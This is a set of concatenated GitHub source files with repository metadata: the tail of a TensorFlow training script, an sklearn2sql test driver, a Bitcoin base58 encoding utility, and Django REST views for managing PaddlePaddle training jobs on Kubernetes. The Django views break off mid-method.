if FLAGS.use_pretrained_model_1 and model_seq<FLAGS.num_seq_models-1:
if FLAGS.finetune_only_head:
save_vars = {}
for i in range(len(model.layers)):
if i != 0:
save_vars['model{}'.format(str(i))] = model.layers[i]
ckpt = tf.train.Checkpoint(**save_vars)
else:
ckpt = tf.train.Checkpoint(model=model)
checkpoint_manager = tf.train.CheckpointManager(
ckpt, directory=FLAGS.pretrained_model_paths[model_seq], max_to_keep=1)
logging.info('Loading model')
logging.info(checkpoint_manager.checkpoints)
if FLAGS.use_indexed_checkpoints:
latest_ckpt = FLAGS.pretrained_checkpoint_paths[model_seq]
else:
latest_ckpt = checkpoint_manager.latest_checkpoint
logging.info(latest_ckpt)
if latest_ckpt:
logging.info('Found checkpoint')
ckpt.restore(latest_ckpt).expect_partial()
models.append(model)
continue
steps_per_epoch = (train_len // FLAGS.train_batch_size) + 1
if FLAGS.lr_decay_type == 'step_decay':
decay_epochs = FLAGS.lr_decay_gap * (
np.arange(FLAGS.train_epochs // FLAGS.lr_decay_gap, dtype=int) +
1)
decay_steps = list(decay_epochs * steps_per_epoch)
lr_vals = []
for i in range(len(decay_steps) + 1):
lr_vals.append(FLAGS.learning_rate *
np.power(FLAGS.lr_decay_factor, i))
lr_sched = tf.keras.optimizers.schedules.PiecewiseConstantDecay(
decay_steps, lr_vals)
elif FLAGS.lr_decay_type == 'cosine_decay':
if FLAGS.train_steps > 0:
decay_steps = FLAGS.train_steps
else:
decay_steps = FLAGS.train_epochs * steps_per_epoch
lr_sched = tf.keras.optimizers.schedules.CosineDecay(
FLAGS.learning_rate, decay_steps)
elif FLAGS.lr_decay_type == 'warmup_cosine_decay':
lr_sched = WarmUpAndCosineDecay(FLAGS.learning_rate, train_len)
else:
raise ValueError('Unknown lr decay schedule {}'.format(
FLAGS.lr_decay_type))
# Instantiate optimizer
if FLAGS.optimizer == 'Adam':
optimizer = tf.keras.optimizers.Adam(learning_rate=lr_sched)
if FLAGS.project_out_rank > 0:
optimizer2 = tf.keras.optimizers.Adam(learning_rate=lr_sched)
else:
optimizer2 = None
elif FLAGS.optimizer == 'sgd':
optimizer = tf.keras.optimizers.SGD(
learning_rate=lr_sched, momentum=FLAGS.momentum)
if FLAGS.project_out_rank > 0:
optimizer2 = tf.keras.optimizers.SGD(learning_rate=lr_sched, momentum=FLAGS.momentum)
else:
optimizer2 = None
else:
raise ValueError('Unknown optimizer {}'.format(FLAGS.optimizer))
logging.info('Starting training')
epoch = tf.Variable(0)
if FLAGS.finetune_only_head:
save_vars = {}
save_vars['optimizer'] = optimizer
save_vars['epoch'] = epoch
for i in range(len(model.layers)):
if i != 0:
save_vars['model{}'.format(str(i))] = model.layers[i]
ckpt = tf.train.Checkpoint(**save_vars)
else:
ckpt = tf.train.Checkpoint(
model=model, optimizer=optimizer, epoch=epoch)
checkpoint_manager = tf.train.CheckpointManager(
ckpt,
directory='{}{}/{}/'.format(FLAGS.model_dir, str(run), str(model_seq)),
max_to_keep=100)
if FLAGS.load_model:
logging.info('Loading model')
latest_ckpt = checkpoint_manager.latest_checkpoint
if latest_ckpt:
logging.info('Found checkpoint')
ckpt.restore(latest_ckpt).expect_partial()
if FLAGS.task_id in ['CIFAR-10.2', 'CIFAR-10.2-finetune', 'CINIC', 'CINIC-finetune', 'CIFAR-MNIST', 'LMS', 'color-MNIST']:
model, vals = train(
model,
ds_train,
ds_val,
ds_test,
train_len,
optimizer,
run=run,
extra_dsets=[ds_OOD_test],
num_heads=FLAGS.num_heads,
ckpt_manager=checkpoint_manager,
prev_models=models,
MI_ds = MI_ds,
optimizer2 = optimizer2,
W = W,
only_head=FLAGS.finetune_only_head,
only_linear_head=FLAGS.finetune_only_linear_head)
elif FLAGS.task_id == 'DRO' or FLAGS.task_id == 'Imagenette':
model, vals = train(
model,
ds_train,
ds_val,
ds_test,
train_len,
optimizer,
run=run,
only_head=FLAGS.finetune_only_head,
ckpt_manager=checkpoint_manager,
prev_models=models,
only_linear_head=FLAGS.finetune_only_linear_head)
else:
model, vals = train(
model,
ds_train,
ds_val,
ds_test,
train_len,
optimizer,
run=run,
ckpt_manager=checkpoint_manager,
prev_models=models)
models.append(model)
if run == 0:
vals_avg.append(vals)
else:
vals_avg[model_seq-adjust] = (1.0 / (run + 1.0)) * vals + (run / (run + 1.0)) * vals_avg[model_seq-adjust]
if run == 0:
vals_std.append(vals**2)
else:
vals_std[model_seq-adjust] = (1.0 / (run + 1.0)) * (vals**2) + (run /
(run + 1.0)) * vals_std[model_seq-adjust]
logging.info('Finished training')
if FLAGS.task_id in ['CIFAR-10.2-finetune', 'CINIC-finetune', 'CIFAR-MNIST', 'color-MNIST', 'LMS']:
with strategy.scope():
if FLAGS.use_pretrained:
base_model = models[0].layers[0]
head_models = []
for i in range(len(models)):
curr_model_layers = []
for layer_ind in range(len(models[i].layers)-1):
if layer_ind > 0:
curr_model_layers.append(models[i].layers[layer_ind])
curr_model = tf.keras.Sequential(layers=curr_model_layers)
head_models.append(curr_model)
model1 = base_multi_head_model(base_model=base_model, head_models=head_models, num_classes=FLAGS.num_classes)
else:
temp_models = []
for i in range(len(models)):
curr_model_layers = []
for layer_ind in range(len(models[i].layers)-1):
curr_model_layers.append(models[i].layers[layer_ind])
curr_model = tf.keras.Sequential(layers=curr_model_layers)
temp_models.append(curr_model)
model1 = multi_base_model(temp_models, FLAGS.num_classes)
steps_per_epoch = (train_len // FLAGS.train_batch_size) + 1
if FLAGS.lr_decay_type == 'step_decay':
decay_epochs = FLAGS.lr_decay_gap * (
np.arange(
FLAGS.train_epochs_finetune // FLAGS.lr_decay_gap,
dtype=int) + 1)
decay_steps = list(decay_epochs * steps_per_epoch)
lr_vals = []
for i in range(len(decay_steps) + 1):
lr_vals.append(FLAGS.learning_rate *
np.power(FLAGS.lr_decay_factor, i))
lr_sched = tf.keras.optimizers.schedules.PiecewiseConstantDecay(
decay_steps, lr_vals)
elif FLAGS.lr_decay_type == 'cosine_decay' or FLAGS.lr_decay_type == 'warmup_cosine_decay':
if FLAGS.train_steps_finetune > 0:
decay_steps = FLAGS.train_steps_finetune
else:
decay_steps = FLAGS.train_epochs_finetune * steps_per_epoch
lr_sched = tf.keras.optimizers.schedules.CosineDecay(
FLAGS.learning_rate, decay_steps)
else:
raise ValueError('Unknown lr decay schedule {}'.format(
FLAGS.lr_decay_type))
# Instantiate optimizer
if FLAGS.optimizer == 'Adam':
optimizer = tf.keras.optimizers.Adam(learning_rate=lr_sched)
elif FLAGS.optimizer == 'sgd':
optimizer = tf.keras.optimizers.SGD(
learning_rate=lr_sched, momentum=FLAGS.momentum)
else:
raise ValueError('Unknown optimizer {}'.format(FLAGS.optimizer))
model1, vals = train(
model1,
ds_OOD_train,
ds_OOD_val,
ds_OOD_test,
OOD_train_len,
optimizer,
run=run,
only_head=True,
only_linear_head=True,
finetune=True,
prefix='OOD_finetune_{}_'.format(model_seq))
if run == 0:
vals_avg_2.append(vals)
else:
vals_avg_2[model_seq-adjust] = (1.0 / (run + 1.0)) * vals + (run /
(run + 1.0)) * vals_avg_2[model_seq-adjust]
if run == 0:
vals_std_2.append(vals**2)
else:
vals_std_2[model_seq-adjust] = (1.0 /
(run + 1.0)) * (vals**2) + (run /
(run + 1.0)) * vals_std_2[model_seq-adjust]
logging.info('Finished finetuning')
if FLAGS.monitor_robustness_measures:
with strategy.scope():
if FLAGS.use_pretrained:
base_model = models[0].layers[0]
head_models = []
for i in range(len(models)):
curr_model_layers = []
for layer_ind in range(len(models[i].layers)-1):
if layer_ind > 0:
curr_model_layers.append(models[i].layers[layer_ind])
curr_model = tf.keras.Sequential(layers=curr_model_layers)
head_models.append(curr_model)
model1 = base_multi_head_model(base_model=base_model, head_models=head_models, num_classes=FLAGS.num_classes)
else:
temp_models = []
for i in range(len(models)):
curr_model_layers = []
for layer_ind in range(len(models[i].layers)-1):
curr_model_layers.append(models[i].layers[layer_ind])
curr_model = tf.keras.Sequential(layers=curr_model_layers)
temp_models.append(curr_model)
model1 = multi_base_model(temp_models, FLAGS.num_classes)
steps_per_epoch = (train_len // FLAGS.train_batch_size) + 1
if FLAGS.lr_decay_type == 'step_decay':
decay_epochs = FLAGS.lr_decay_gap * (
np.arange(
FLAGS.train_epochs_finetune // FLAGS.lr_decay_gap,
dtype=int) + 1)
decay_steps = list(decay_epochs * steps_per_epoch)
lr_vals = []
for i in range(len(decay_steps) + 1):
lr_vals.append(FLAGS.learning_rate *
np.power(FLAGS.lr_decay_factor, i))
lr_sched = tf.keras.optimizers.schedules.PiecewiseConstantDecay(
decay_steps, lr_vals)
elif FLAGS.lr_decay_type == 'cosine_decay' or FLAGS.lr_decay_type == 'warmup_cosine_decay':
if FLAGS.train_steps_finetune > 0:
decay_steps = FLAGS.train_steps_finetune
else:
decay_steps = FLAGS.train_epochs_finetune * steps_per_epoch
lr_sched = tf.keras.optimizers.schedules.CosineDecay(
FLAGS.learning_rate, decay_steps)
else:
raise ValueError('Unknown lr decay schedule {}'.format(
FLAGS.lr_decay_type))
# Instantiate optimizer
if FLAGS.optimizer == 'Adam':
optimizer = tf.keras.optimizers.Adam(learning_rate=lr_sched)
elif FLAGS.optimizer == 'sgd':
optimizer = tf.keras.optimizers.SGD(
learning_rate=lr_sched, momentum=FLAGS.momentum)
else:
raise ValueError('Unknown optimizer {}'.format(FLAGS.optimizer))
model1, vals = train(
model1,
ds_train,
ds_val,
ds_test,
train_len,
optimizer,
run=run,
only_head=True,
only_linear_head=True,
finetune=True,
prefix='non_gauss_finetune_{}_'.format(model_seq))
if run == 0:
vals_avg_3.append(vals)
else:
vals_avg_3[model_seq-adjust] = (1.0 / (run + 1.0)) * vals + (run /
(run + 1.0)) * vals_avg_3[model_seq-adjust]
if run == 0:
vals_std_3.append(vals**2)
else:
vals_std_3[model_seq-adjust] = (1.0 /
(run + 1.0)) * (vals**2) + (run /
(run + 1.0)) * vals_std_3[model_seq-adjust]
if FLAGS.monitor_robustness_measures:
with strategy.scope():
if FLAGS.use_pretrained:
base_model = models[0].layers[0]
head_models = []
for i in range(len(models)):
curr_model_layers = []
for layer_ind in range(len(models[i].layers)-1):
if layer_ind > 0:
curr_model_layers.append(models[i].layers[layer_ind])
curr_model = tf.keras.Sequential(layers=curr_model_layers)
head_models.append(curr_model)
model2 = base_multi_head_model(base_model=base_model, head_models=head_models, num_classes=FLAGS.num_classes)
else:
temp_models = []
for i in range(len(models)):
curr_model_layers = []
for layer_ind in range(len(models[i].layers)-1):
curr_model_layers.append(models[i].layers[layer_ind])
curr_model = tf.keras.Sequential(layers=curr_model_layers)
temp_models.append(curr_model)
model2 = multi_base_model(temp_models, FLAGS.num_classes)
steps_per_epoch = (train_len // FLAGS.train_batch_size) + 1
if FLAGS.lr_decay_type == 'step_decay':
decay_epochs = FLAGS.lr_decay_gap * (
np.arange(
FLAGS.train_epochs_finetune // FLAGS.lr_decay_gap,
dtype=int) + 1)
decay_steps = list(decay_epochs * steps_per_epoch)
lr_vals = []
for i in range(len(decay_steps) + 1):
lr_vals.append(FLAGS.learning_rate *
np.power(FLAGS.lr_decay_factor, i))
lr_sched = tf.keras.optimizers.schedules.PiecewiseConstantDecay(
decay_steps, lr_vals)
elif FLAGS.lr_decay_type == 'cosine_decay' or FLAGS.lr_decay_type == 'warmup_cosine_decay':
if FLAGS.train_steps_finetune > 0:
decay_steps = FLAGS.train_steps_finetune
else:
decay_steps = FLAGS.train_epochs_finetune * steps_per_epoch
lr_sched = tf.keras.optimizers.schedules.CosineDecay(
FLAGS.learning_rate, decay_steps)
else:
raise ValueError('Unknown lr decay schedule {}'.format(
FLAGS.lr_decay_type))
# Instantiate optimizer
if FLAGS.optimizer == 'Adam':
optimizer = tf.keras.optimizers.Adam(learning_rate=lr_sched)
elif FLAGS.optimizer == 'sgd':
optimizer = tf.keras.optimizers.SGD(
learning_rate=lr_sched, momentum=FLAGS.momentum)
else:
raise ValueError('Unknown optimizer {}'.format(FLAGS.optimizer))
model2, vals = train(
model2,
ds_train,
ds_val,
ds_test,
train_len,
optimizer,
run=run,
only_head=True,
only_linear_head=True,
finetune=True,
prefix='gauss_finetune_{}_'.format(model_seq),
add_gauss_noise=True)
if run == 0:
vals_avg_4.append(vals)
else:
vals_avg_4[model_seq-adjust] = (1.0 / (run + 1.0)) * vals + (run /
(run + 1.0)) * vals_avg_4[model_seq-adjust]
if run == 0:
vals_std_4.append(vals**2)
else:
vals_std_4[model_seq-adjust] = (1.0 /
(run + 1.0)) * (vals**2) + (run /
(run + 1.0)) * vals_std_4[model_seq-adjust]
for i in range(FLAGS.num_seq_models-adjust):
vals_std[i] = np.sqrt(vals_std[i] - vals_avg[i]**2)
if len(vals_std_2) > 0:
vals_std_2[i] = np.sqrt(vals_std_2[i] - vals_avg_2[i]**2)
if FLAGS.monitor_robustness_measures:
vals_std_3[i] = np.sqrt(vals_std_3[i] - vals_avg_3[i]**2)
vals_std_4[i] = np.sqrt(vals_std_4[i] - vals_avg_4[i]**2)
else:
ValueError('Unknown Stage {}'.format(stage))
# Entry point: absl handles flag parsing before invoking main().
if __name__ == '__main__':
  app.run(main)
| {
"content_hash": "048a6c1a5746fc584efb13982fa042a6",
"timestamp": "",
"source": "github",
"line_count": 1090,
"max_line_length": 158,
"avg_line_length": 43.154128440366975,
"alnum_prop": 0.5802330031038735,
"repo_name": "google-research/simplicity-bias",
"id": "ad1d9f51c0b7c499fbeb2acddffd114dc6dc77c2",
"size": "47730",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "task_seq.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "312703"
}
],
"symlink_target": ""
} |
# Auto-generated test driver: generate and validate Hive SQL for a
# RandomForestClassifier fitted on the BreastCancer dataset.
from sklearn2sql_heroku.tests.classification import generic as class_gen
class_gen.test_model("RandomForestClassifier" , "BreastCancer" , "hive")
| {
"content_hash": "74078eb2bfe443946c010244f01c3a4d",
"timestamp": "",
"source": "github",
"line_count": 4,
"max_line_length": 72,
"avg_line_length": 37,
"alnum_prop": 0.7972972972972973,
"repo_name": "antoinecarme/sklearn2sql_heroku",
"id": "b5d653ef13f7faf680df182de06fcca2f1e2f4fc",
"size": "148",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/classification/BreastCancer/ws_BreastCancer_RandomForestClassifier_hive_code_gen.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "507043"
},
{
"name": "Procfile",
"bytes": "37"
},
{
"name": "Python",
"bytes": "1021137"
},
{
"name": "R",
"bytes": "2521"
}
],
"symlink_target": ""
} |
'''
Bitcoin base58 encoding and decoding.
Based on https://bitcointalk.org/index.php?topic=1026.0 (public domain)
'''
import hashlib
# for compatibility with following code...
class SHA256:
    # Thin shim exposing hashlib's SHA-256 behind the PyCrypto-style
    # ``SHA256.new(...)`` constructor the functions below expect.
    new = hashlib.sha256
if str != bytes:
    # Python 3.x
    # Iterating/indexing a bytes object yields ints on Python 3, so shadow
    # ord/chr at module scope: ord becomes a pass-through for ints, and chr
    # packs a single int into a one-byte bytes object. On Python 2 the
    # builtins are left untouched.
    def ord(c):
        return c
    def chr(n):
        return bytes((n,))
__b58chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
__b58base = len(__b58chars)
b58chars = __b58chars


def b58encode(v):
    """Encode ``v``, a string of bytes, to a base58 string.

    Leading 0x00 bytes are compressed into leading '1' characters,
    matching Bitcoin's convention.
    """
    long_value = 0
    for (i, c) in enumerate(v[::-1]):
        # Normalize to an int: Python 2 iterates bytes as 1-char strings,
        # Python 3 iterates them as ints.
        if isinstance(c, str):
            c = ord(c)
        long_value += (256 ** i) * c
    result = ''
    while long_value >= __b58base:
        long_value, mod = divmod(long_value, __b58base)
        result = __b58chars[mod] + result
    result = __b58chars[long_value] + result
    # Bitcoin's leading-zero compression: each leading 0x00 byte becomes '1'.
    nPad = 0
    for c in v:
        if isinstance(c, str):
            # fix: on Python 2 the previous `c == 0` test compared a 1-char
            # str against an int and was never true, so padding was dropped.
            c = ord(c)
        if c == 0:
            nPad += 1
        else:
            break
    return (__b58chars[0] * nPad) + result


def b58decode(v, length=None):
    """Decode base58 string ``v`` into a string of bytes.

    Returns None when ``length`` is given and the decoded payload has a
    different length. Raises AssertionError on a non-base58 character.
    """
    long_value = 0
    for i, c in enumerate(v[::-1]):
        pos = __b58chars.find(c)
        assert pos != -1
        long_value += pos * (__b58base ** i)
    # Emit base-256 digits into a bytearray, which behaves identically on
    # Python 2 and 3 (the previous chr()-based concatenation broke on Py2).
    digits = bytearray()
    while long_value >= 256:
        long_value, mod = divmod(long_value, 256)
        digits.insert(0, mod)
    digits.insert(0, long_value)
    # Leading '1' characters decode back to leading zero bytes.
    nPad = 0
    for c in v:
        if c == __b58chars[0]:
            nPad += 1
        else:
            break
    # fix: `bytes(nPad)` is str(nPad) on Python 2 (e.g. "3"), not NUL
    # padding; a zero-filled bytearray works on both interpreters.
    result = bytes(bytearray(nPad) + digits)
    if length is not None and len(result) != length:
        return None
    return result
def checksum(v):
    """Return a 4-byte checksum: the first 4 bytes of SHA256(SHA256(v)).

    Uses hashlib directly (already imported at module top) instead of the
    SHA256 shim class, so the function has no module-local dependencies.
    """
    return hashlib.sha256(hashlib.sha256(v).digest()).digest()[0:4]
def b58encode_chk(v):
    """Base58-encode ``v`` with a trailing 4-byte SHA256d checksum."""
    payload = v + checksum(v)
    return b58encode(payload)
def b58decode_chk(v):
    """Decode a base58 string, verifying and stripping its 4-byte checksum.

    Returns the payload bytes, or None when decoding fails or the
    checksum does not match.
    """
    decoded = b58decode(v)
    if decoded is None:
        return None
    payload, chk = decoded[:-4], decoded[-4:]
    if chk != checksum(payload):
        return None
    return payload
def get_bcaddress_version(strAddress):
    """Return the integer version byte of a Bitcoin address.

    Returns None when ``strAddress`` is not a valid checksummed address
    of the expected 21-byte (version + hash160) length.
    """
    decoded = b58decode_chk(strAddress)
    if decoded is None or len(decoded) != 21:
        return None
    return ord(decoded[0])
if __name__ == '__main__':
    # Test case (from http://gitorious.org/bitcoin/python-base58.git)
    # Smoke tests: a known mainnet address yields version byte 0, and a
    # short ASCII payload round-trips through encode/decode.
    assert get_bcaddress_version('15VjRaDX9zpbA8LVnbrCAFzrVzN7ixHNsC') == 0
    _ohai = 'o hai'.encode('ascii')
    _tmp = b58encode(_ohai)
    assert _tmp == 'DYB3oMS'
    assert b58decode(_tmp, 5) == _ohai
    print("Tests passed")
| {
"content_hash": "526c7c34815e81344075e8ac3d2714e5",
"timestamp": "",
"source": "github",
"line_count": 123,
"max_line_length": 97,
"avg_line_length": 23.934959349593495,
"alnum_prop": 0.5883152173913043,
"repo_name": "Bitcoin-ABC/bitcoin-abc",
"id": "88d6da81d09946c24cf86db2382e25a679917576",
"size": "3158",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "contrib/testgen/base58.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "28178"
},
{
"name": "C",
"bytes": "1160721"
},
{
"name": "C++",
"bytes": "9817660"
},
{
"name": "CMake",
"bytes": "195193"
},
{
"name": "CSS",
"bytes": "4284"
},
{
"name": "Dockerfile",
"bytes": "3559"
},
{
"name": "HTML",
"bytes": "25754"
},
{
"name": "Java",
"bytes": "41238"
},
{
"name": "JavaScript",
"bytes": "2366459"
},
{
"name": "Kotlin",
"bytes": "3712"
},
{
"name": "M4",
"bytes": "31132"
},
{
"name": "Makefile",
"bytes": "100617"
},
{
"name": "Objective-C++",
"bytes": "5811"
},
{
"name": "PHP",
"bytes": "94504"
},
{
"name": "Perl",
"bytes": "4551"
},
{
"name": "PowerShell",
"bytes": "2277"
},
{
"name": "Python",
"bytes": "2706993"
},
{
"name": "QMake",
"bytes": "798"
},
{
"name": "Ruby",
"bytes": "21108"
},
{
"name": "Rust",
"bytes": "54953"
},
{
"name": "Sage",
"bytes": "39795"
},
{
"name": "Shell",
"bytes": "167526"
},
{
"name": "TypeScript",
"bytes": "66320"
}
],
"symlink_target": ""
} |
from django.http import HttpResponseRedirect, HttpResponse, JsonResponse, HttpResponseNotFound, HttpResponseForbidden
from django.contrib import messages
from django.conf import settings
from django.utils.encoding import smart_str
from django.contrib.auth.decorators import login_required
from kubernetes import client, config
from kubernetes.client.rest import ApiException
from . import PaddleJob
from rest_framework.authtoken.models import Token
from rest_framework import viewsets, generics, permissions
from rest_framework.response import Response
from rest_framework.views import APIView
from rest_framework.parsers import MultiPartParser, FormParser, FileUploadParser
import json
import utils
import notebook.utils
import logging
import os
import copy
from notebook.models import FilePublish
import uuid
from cloudprovider.k8s_provider import K8sProvider
from paddle_job import PaddleJob
def file_publish_view(request):
    """
    view for download published files

    Looks up a FilePublish record by the ``uuid`` query parameter and
    streams the corresponding file back as an attachment. Returns 404
    when the uuid is missing, unknown, or refers to a folder.
    """
    # NOTE(review): username is never used below.
    username = request.user.username
    publish_uuid = request.GET.get("uuid")
    if not publish_uuid:
        return HttpResponseNotFound()
    record = FilePublish.objects.get(uuid=publish_uuid)
    if not record:
        return HttpResponseNotFound()
    # FIXME(typhoonzero): not support folder currently
    if record.path.endswith("/"):
        return HttpResponseNotFound()
    # Drop the /pfs/[dc]/home/[user] prefix (first 4 components) and
    # re-root the path under the server's storage directory.
    real_path = "/".join([settings.STORAGE_PATH] + record.path.split("/")[4:])
    logging.info("downloading file from: %s, record(%s)", real_path,
                 record.path)
    # mimetype is replaced by content_type for django 1.7
    response = HttpResponse(
        open(real_path), content_type='application/force-download')
    response[
        'Content-Disposition'] = 'attachment; filename=%s' % os.path.basename(
            record.path)
    # It's usually a good idea to set the 'Content-Length' header too.
    # You can also set any other required headers: Cache-Control, etc.
    return response
class FilePublishAPIView(APIView):
    # REST API for listing a user's published files and minting new
    # sharing URLs (served for download by file_publish_view).
    permission_classes = (permissions.IsAuthenticated, )
    def get(self, request, format=None):
        """
        return a list of published files for current user
        """
        record = FilePublish.objects.filter(user=request.user)
        file_list = [rec.path for rec in record]
        url_list = [rec.url for rec in record]
        return Response({"files": file_list, "urls": url_list})
    def post(self, request, format=None):
        """
        given a pfs path generate a uniq sharing url for the path
        """
        post_body = json.loads(request.body)
        file_path = post_body.get("path")
        # A random uuid is the only capability needed to fetch the file.
        publish_uuid = uuid.uuid4()
        publish_url = "http://%s/filepub/?uuid=%s" % (
            request.META["HTTP_HOST"], publish_uuid)
        # save publish_url to mysql
        publish_record = FilePublish()
        publish_record.url = publish_url
        publish_record.user = request.user
        publish_record.path = file_path
        publish_record.uuid = publish_uuid
        publish_record.save()
        return Response({"url": publish_url})
def get_paddlejob(request):
    """Build a PaddleJob description from the JSON body of ``request``.

    Validates that a topology or entry point and a datacenter are
    provided, and that the job package was already uploaded under the
    user's PFS home. On success returns a PaddleJob instance; on
    validation failure returns an HTTP error response object (callers
    pass it straight back to the client).
    """
    username = request.user.username
    obj = json.loads(request.body)
    topology = obj.get("topology", "")
    entry = obj.get("entry", "")
    if not topology and not entry:
        return utils.simple_response(500, "no topology or entry specified")
    if not obj.get("datacenter"):
        return utils.simple_response(500, "no datacenter specified")
    # NOTE(review): cfgs is assigned but never used below.
    cfgs = {}
    dc = obj.get("datacenter")
    # jobPackage validation: startwith /pfs
    # NOTE: job packages are uploaded to /pfs/[dc]/home/[user]/jobs/[jobname]
    job_name = obj.get("name", "paddle-cluster-job")
    package_in_pod = os.path.join("/pfs/%s/home/%s" % (dc, username), "jobs",
                                  job_name)
    logging.info("current package: %s", package_in_pod)
    # package must be ready before submit a job
    package_path_4test = package_in_pod.replace("/pfs/%s/home" % dc,
                                                settings.STORAGE_PATH)
    if not os.path.exists(package_path_4test):
        # Fall back to the storage layout without the username component.
        package_path_4test = package_in_pod.replace("/pfs/%s/home/%s" % (
            dc, username), settings.STORAGE_PATH)
        if not os.path.exists(package_path_4test):
            return utils.error_message_response(
                "package not exist in cloud: %s" % package_path_4test)
    logging.info("current package in pod: %s", package_path_4test)
    envs = {}
    envs.update({"PADDLE_CLOUD_CURRENT_DATACENTER": dc})
    envs.update({"PADDLE_CLOUD_USERNAME": username})
    # ===================== create PaddleJob instance ======================
    paddle_job = PaddleJob(
        name=job_name,
        job_package=package_in_pod,
        parallelism=obj.get("parallelism", 1),
        cpu=obj.get("cpu", 1),
        memory=obj.get("memory", "1Gi"),
        pservers=obj.get("pservers", 1),
        pscpu=obj.get("pscpu", 1),
        psmemory=obj.get("psmemory", "1Gi"),
        topology=topology,
        entry=entry,
        gpu=obj.get("gpu", 0),
        image=obj.get("image", None),
        passes=obj.get("passes", 1),
        registry_secret=obj.get("registry", None),
        volumes=[],
        envs=envs,
        fault_tolerant=obj.get("faulttolerant", False),
        min_instance=obj.get("min_instance", 1),
        max_instance=obj.get("max_instance", 1),
        etcd_image=settings.ETCD_IMAGE,
        dc=dc)
    logging.info("return paddlejob")
    return paddle_job
class TrainingJobsView(APIView):
    """REST endpoints for listing, submitting and killing TrainingJob
    resources through the Kubernetes provider."""
    permission_classes = (permissions.IsAuthenticated, )

    def get(self, request, format=None):
        """Return all trainingjobs belonging to the current user."""
        username = request.user.username
        p = K8sProvider()
        ret_dict = p.get_trainingjobs(username)
        return Response(ret_dict)

    def post(self, request, format=None):
        """
        Submit a trainingjobs.
        """
        username = request.user.username
        job = get_paddlejob(request)
        p = K8sProvider()
        try:
            p.submit_trainingjobs(job, username)
        # fix: `except Exception, e` is Python-2-only syntax; `as e` works
        # on Python 2.6+ and matches `except OSError as exc` used elsewhere
        # in this module.
        except Exception as e:
            return utils.error_message_response(str(e))
        return utils.simple_response(200, "")

    def delete(self, request, format=None):
        """
        Kill a trainingjobs.
        """
        username = request.user.username
        obj = json.loads(request.body)
        jobname = obj.get("jobname")
        p = K8sProvider()
        retcode, status = p.delete_trainingjobs(jobname, username)
        return utils.simple_response(retcode, "\n".join(status))
class JobsView(APIView):
    """REST endpoints for listing, submitting and killing PaddlePaddle
    jobs through the Kubernetes provider."""
    permission_classes = (permissions.IsAuthenticated, )

    def get(self, request, format=None):
        """Return all jobs belonging to the current user."""
        username = request.user.username
        p = K8sProvider()
        ret_dict = p.get_jobs(username)
        return Response(ret_dict)

    def post(self, request, format=None):
        """
        Submit the PaddlePaddle job
        """
        # ========== submit master ReplicaSet if using fault_tolerant feature ==
        username = request.user.username
        job = get_paddlejob(request)
        p = K8sProvider()
        try:
            p.submit_job(job, username)
        # fix: `except Exception, e` is Python-2-only syntax; `as e` works
        # on Python 2.6+ and matches `except OSError as exc` used elsewhere
        # in this module.
        except Exception as e:
            return utils.error_message_response(str(e))
        return utils.simple_response(200, "")

    def delete(self, request, format=None):
        """
        Kill a job
        """
        username = request.user.username
        obj = json.loads(request.body)
        jobname = obj.get("jobname")
        p = K8sProvider()
        retcode, status = p.delete_job(jobname, username)
        return utils.simple_response(retcode, "\n".join(status))
class PserversView(APIView):
    """Expose the parameter-server listing for the requesting user."""
    permission_classes = (permissions.IsAuthenticated, )

    def get(self, request, format=None):
        """
        List all pservers
        """
        provider = K8sProvider()
        return Response(provider.get_pservers(request.user.username))
class LogsView(APIView):
    """Fetch trainer log output for one of the user's jobs."""
    permission_classes = (permissions.IsAuthenticated, )

    def get(self, request, format=None):
        """Return the last ``n`` log lines of worker ``w`` for ``jobname``."""
        params = request.query_params
        total_job_log = K8sProvider().get_logs(
            params.get("jobname"), params.get("n"), params.get("w"),
            request.user.username)
        return utils.simple_response(200, total_job_log)
class WorkersView(APIView):
    """List worker status for one of the user's jobs."""
    permission_classes = (permissions.IsAuthenticated, )

    def get(self, request, format=None):
        """Return workers of the job named in the query string."""
        job_name = request.query_params.get("jobname")
        workers = K8sProvider().get_workers(job_name, request.user.username)
        return Response(workers)
class QuotaView(APIView):
    """Report resource quotas of the requesting user."""
    permission_classes = (permissions.IsAuthenticated, )

    def get(self, request, format=None):
        """Return quota information for the current user."""
        quotas = K8sProvider().get_quotas(request.user.username)
        return Response(quotas)
class GetUserView(APIView):
    """Return the username of the authenticated caller."""
    permission_classes = (permissions.IsAuthenticated, )

    def get(self, request, format=None):
        """
        Get user name
        """
        # request.user is a `django.contrib.auth.User` instance.
        return Response({'user': request.user.username})
class SimpleFileView(APIView):
    """Upload or download a single file under the requesting user's
    PFS home directory."""
    permission_classes = (permissions.IsAuthenticated, )
    parser_classes = (
        FormParser,
        MultiPartParser, )

    def __validate_path(self, request, file_path):
        """Map a /pfs/[dc]/home/[user]/... path to the server-side path.

        Raises (AssertionError/IndexError/AttributeError) when the path
        does not belong to the requesting user; callers turn that into an
        error response.
        """
        path_parts = file_path.split(os.path.sep)
        assert (path_parts[1] == "pfs")
        assert (path_parts[2] in settings.DATACENTERS.keys())
        assert (path_parts[3] == "home")
        assert (path_parts[4] == request.user.username)
        server_file = os.path.join(settings.STORAGE_PATH,
                                   request.user.username, *path_parts[5:])
        return server_file

    def get(self, request, format=None):
        """
        Simple get file.
        """
        file_path = request.query_params.get("path")
        try:
            write_file = self.__validate_path(request, file_path)
        # fix: `except Exception, e` is Python-2-only syntax.
        except Exception as e:
            return utils.error_message_response("file path not valid: %s" %
                                                str(e))
        # NOTE(review): existence is checked on os.sep + write_file but the
        # file is opened as write_file — confirm STORAGE_PATH handling.
        if not os.path.exists(os.sep + write_file):
            return Response({"msg": "file not exist"})
        response = HttpResponse(
            open(write_file), content_type='application/force-download')
        response[
            'Content-Disposition'] = 'attachment; filename="%s"' % os.path.basename(
                write_file)
        return response

    def post(self, request, format=None):
        """
        Simple put file.
        """
        file_obj = request.data['file']
        file_path = request.query_params.get("path")
        if not file_path:
            return utils.error_message_response("must specify path")
        try:
            write_file = self.__validate_path(request, file_path)
